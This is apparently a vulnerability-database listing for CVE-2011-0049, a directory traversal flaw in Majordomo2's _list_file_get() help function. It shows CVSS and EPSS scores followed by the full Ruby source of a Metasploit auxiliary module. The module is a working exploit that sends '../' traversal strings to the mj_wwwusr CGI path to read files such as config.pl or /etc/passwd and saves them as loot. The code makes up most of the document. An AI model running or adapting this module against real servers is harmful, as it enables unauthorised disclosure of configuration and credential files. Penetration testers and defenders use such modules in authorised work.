Majordomo2 _list_file_get() Directory Traversal

2024-09-0100:00:00

Jay Turla, metasploit.com

packetstormsecurity.com

metasploit

http

directory traversal

majordomo2

vulnerability

remote

exploit

directory

retrieval

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

AI Score

Confidence

Low

EPSS

0.881

Percentile

98.7%

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Majordomo2 _list_file_get() Directory Traversal',  
'Description' => %q{  
This module exploits a directory traversal vulnerability present in  
the _list_file_get() function of Majordomo2 (help function). By default, this  
module will attempt to download the Majordomo config.pl file.  
},  
'Author' => ['Nikolas Sotiriu'],  
'References' =>  
[  
['OSVDB', '70762'],  
['CVE', '2011-0049'],  
['CVE', '2011-0063'],  
['URL', 'https://www.sotiriu.de/adv/NSOADV-2011-003.txt'],  
['EDB', '16103']  
],  
'DisclosureDate' => 'Mar 08 2011',  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
OptString.new('FILE', [ true, "Define the remote file to view, ex:/etc/passwd", 'config.pl']),  
OptString.new('URI', [true, 'Majordomo vulnerable URI path', '/cgi-bin/mj_wwwusr/domain=domain?user=&passw=&func=help&extra=']),  
OptInt.new('DEPTH', [true, 'Define the max traversal depth', 8]),  
])  
end  
  
def run_host(ip)  
trav_strings = [  
'../',  
'./.../'  
]  
uri = normalize_uri(datastore['URI'])  
file = datastore['FILE']  
deep = datastore['DEPTH']  
file = file.gsub(/^\//, "")  
  
trav_strings.each do |trav|  
str = ""  
i = 1  
while (i <= deep)  
str = trav * i  
payload = "#{str}#{file}"  
  
res = send_request_raw(  
{  
'method' => 'GET',  
'uri' => uri + payload,  
}, 25)  
  
if res.nil?  
print_error("#{rhost}:#{rport} Connection timed out")  
return  
end  
  
print_status("#{rhost}:#{rport} Trying URL " + payload )  
  
if (res and res.code == 200 and res.body)  
if res.body.match(/\<html\>(.*)\<\/html\>/im)  
html = $1  
  
if res.body =~ /unknowntopic/  
print_error("#{rhost}:#{rport} Could not retrieve the file")  
else  
file_data = html.gsub(%r{(.*)<pre>|<\/pre>(.*)}m, '')  
print_good("#{rhost}:#{rport} Successfully retrieved #{file} and storing as loot...")  
  
# Transform HTML entities back to the original characters  
file_data = file_data.gsub(/\&gt\;/i, '>').gsub(/\&lt\;/i, '<').gsub(/\&quot\;/i, '"')  
  
store_loot("majordomo2.traversal.file", "application/octet-stream", rhost, file_data, file)  
return  
end  
else  
print_error("#{rhost}:#{rport} No HTML was returned")  
end  
else  
# if res is nil, we hit this  
print_error("#{rhost}:#{rport} Unrecognized #{res.code} response")  
end  
i += 1;  
end  
end  
  
print_error("#{rhost}:#{rport} Not vulnerable or the DEPTH setting was too low")  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout  
rescue ::Timeout::Error, ::Errno::EPIPE  
end  
end  
`